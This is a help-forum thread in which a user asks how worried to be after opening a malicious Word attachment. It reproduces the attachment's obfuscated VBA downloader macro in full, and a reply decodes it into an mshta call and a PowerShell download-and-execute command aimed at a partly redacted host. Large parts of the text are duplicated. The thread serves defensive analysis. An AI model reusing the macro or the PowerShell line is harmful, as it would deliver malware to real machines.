Opened malicious word attachment
January 15, 2018 12:16 PM Subscribe
MS Word 365. We got an email with a word document that asked to "enable content" to actually see the contents. We did not actually click the "enable contents" button in the yellow bar, but did click the "enable editing" button.
Googlefu says not to click. The contents is obfuscated.
Norton is running and did not complain. How freaked out should we be?
Virus total found 10/60 postives
HEUR.VBA.Trojan.e
VBA.Trojan-Downloader.Agent.cko
PP97M/Agent.gen
VBA/TrojanDownloader.Agent.GFR
PP97M/Agent.gen
VBA/Agent.E650!tr
Trojan-Downloader.VBA.Agent
HEUR:Trojan-Downloader.Script.Generic
Probably W97Obfuscated
OLE Compound File Info
May try to run other files, shell commands or applications.
--Seems to contain deobfuscation code.
--Makes use of macros
--Macros And VBA Code Streams
ThisDocument.cls:
Private Function undertake(uncourting)
tufting = Array("c", "o", "i", "p", "y", "M", "W", "1", "u", "h", "E", "g", "V", "D", "l", "f", "5", "m", "7", "H", "r", "J", "4", "9", "G", "8", "t", "d")
antilithic = Array(".", "c", "j", "/", "f", "=", "n", "p", "h", ":", "m", "q", "o", "a", "i", "w", "?", "G", "P", "d", " ", "s", "x", "e", "k", "R", "u", "t")
berghaan = vbNullString
For Each ridder In uncourting
flameflower = boarwood(ridder, tufting)
If flameflower > -1 Then
berghaan = antilithic(flameflower) + berghaan
End If
Next
undertake = StrReverse(berghaan)
End Function
Public Function boarwood(annuals, reverberates)
fizzle = 5521
proctor = 7919
For fizzle = 0 To UBound(reverberates)
If reverberates(fizzle) = annuals And fizzle > -1 Then
proctor = fizzle
End If
Next
If proctor = 7919 Then
proctor = -1
End If
boarwood = proctor
End Function
Sub AutoClose()
uncourting = Array("E", "J", "u", "d", "D", "c", "9", "4", "9", "r", "u", "d", "d", "1", "h", "p", "p", "l", "i", "H", "g", "W", "f", "H", "g", "t", "f", "H", "V", "D", "J", "l", "H", "i", "c", "o", "V", "E", "p", "8", "7", "m", "p", "J", "V", "y", "c", "1", "u", "1", "5", "t", "d", "E", "D", "M", "V", "1", "J", "G")
pidginize = undertake(uncourting)
Application.Run "hoodlum", (pidginize)
End Sub
Private Sub hoodlum(exchangers)
medicant = 16202
ectepicondylar = True
While ectepicondylar
peripatecically = medicant + 717
If peripatecically - medicant > 1 Then
stricken = precompact + "ll"
Call VBA.Shell(exchangers, vbNormalFocus - 1)
ectepicondylar = False
End If
Wend
End Sub
Virus total found 10/60 postives
HEUR.VBA.Trojan.e
VBA.Trojan-Downloader.Agent.cko
PP97M/Agent.gen
VBA/TrojanDownloader.Agent.GFR
PP97M/Agent.gen
VBA/Agent.E650!tr
Trojan-Downloader.VBA.Agent
HEUR:Trojan-Downloader.Script.Generic
Probably W97Obfuscated
OLE Compound File Info
May try to run other files, shell commands or applications.
--Seems to contain deobfuscation code.
--Makes use of macros
--Macros And VBA Code Streams
ThisDocument.cls:
Private Function undertake(uncourting)
tufting = Array("c", "o", "i", "p", "y", "M", "W", "1", "u", "h", "E", "g", "V", "D", "l", "f", "5", "m", "7", "H", "r", "J", "4", "9", "G", "8", "t", "d")
antilithic = Array(".", "c", "j", "/", "f", "=", "n", "p", "h", ":", "m", "q", "o", "a", "i", "w", "?", "G", "P", "d", " ", "s", "x", "e", "k", "R", "u", "t")
berghaan = vbNullString
For Each ridder In uncourting
flameflower = boarwood(ridder, tufting)
If flameflower > -1 Then
berghaan = antilithic(flameflower) + berghaan
End If
Next
undertake = StrReverse(berghaan)
End Function
Public Function boarwood(annuals, reverberates)
fizzle = 5521
proctor = 7919
For fizzle = 0 To UBound(reverberates)
If reverberates(fizzle) = annuals And fizzle > -1 Then
proctor = fizzle
End If
Next
If proctor = 7919 Then
proctor = -1
End If
boarwood = proctor
End Function
Sub AutoClose()
uncourting = Array("E", "J", "u", "d", "D", "c", "9", "4", "9", "r", "u", "d", "d", "1", "h", "p", "p", "l", "i", "H", "g", "W", "f", "H", "g", "t", "f", "H", "V", "D", "J", "l", "H", "i", "c", "o", "V", "E", "p", "8", "7", "m", "p", "J", "V", "y", "c", "1", "u", "1", "5", "t", "d", "E", "D", "M", "V", "1", "J", "G")
pidginize = undertake(uncourting)
Application.Run "hoodlum", (pidginize)
End Sub
Private Sub hoodlum(exchangers)
medicant = 16202
ectepicondylar = True
While ectepicondylar
peripatecically = medicant + 717
If peripatecically - medicant > 1 Then
stricken = precompact + "ll"
Call VBA.Shell(exchangers, vbNormalFocus - 1)
ectepicondylar = False
End If
Wend
End Sub
I would make that backup on fresh media so you don't overwrite the previous backup.
posted by amtho at 1:18 PM on January 15, 2018
posted by amtho at 1:18 PM on January 15, 2018
Well... it runs the command "mshta.exe http://*notshown*.com/RPG/sof.php?utma=opsk" (in the background) which leads to a webpage that tries to construct and run an ActiveX script.
The activeX script does this: powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://*notshown*.com/RPG/opsk.pfx\', $env:APPDATA + \'\\\\fbe24138.exe\'); Start-Process $env:APPDATA\'\\\\fbe24138.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://*notshown*.com/s.php?id=opsk\');
So if it was successful there's a file (or more files if it replicated) in your APPDATA folder that you need to delete (you'd probably also see that fbe24138.exe file running in task manager or other similar named files)
Don't know if this really helps. Didn't want to paste the full *notshown* URL but if you're really curious I can give it to you, though I don't recommend going there...
posted by one4themoment at 1:20 PM on January 15, 2018 [3 favorites]
The activeX script does this: powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://*notshown*.com/RPG/opsk.pfx\', $env:APPDATA + \'\\\\fbe24138.exe\'); Start-Process $env:APPDATA\'\\\\fbe24138.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://*notshown*.com/s.php?id=opsk\');
So if it was successful there's a file (or more files if it replicated) in your APPDATA folder that you need to delete (you'd probably also see that fbe24138.exe file running in task manager or other similar named files)
Don't know if this really helps. Didn't want to paste the full *notshown* URL but if you're really curious I can give it to you, though I don't recommend going there...
posted by one4themoment at 1:20 PM on January 15, 2018 [3 favorites]
Response by poster: Awesome. Thanks so much, one4themoment.
posted by nostrada at 2:38 PM on January 15, 2018
posted by nostrada at 2:38 PM on January 15, 2018
« Older What options do I have for adjusting travel due to... | Which science fiction magazines/webzines take... Newer »
This thread is closed to new comments.
posted by pravit at 1:07 PM on January 15, 2018 [1 favorite]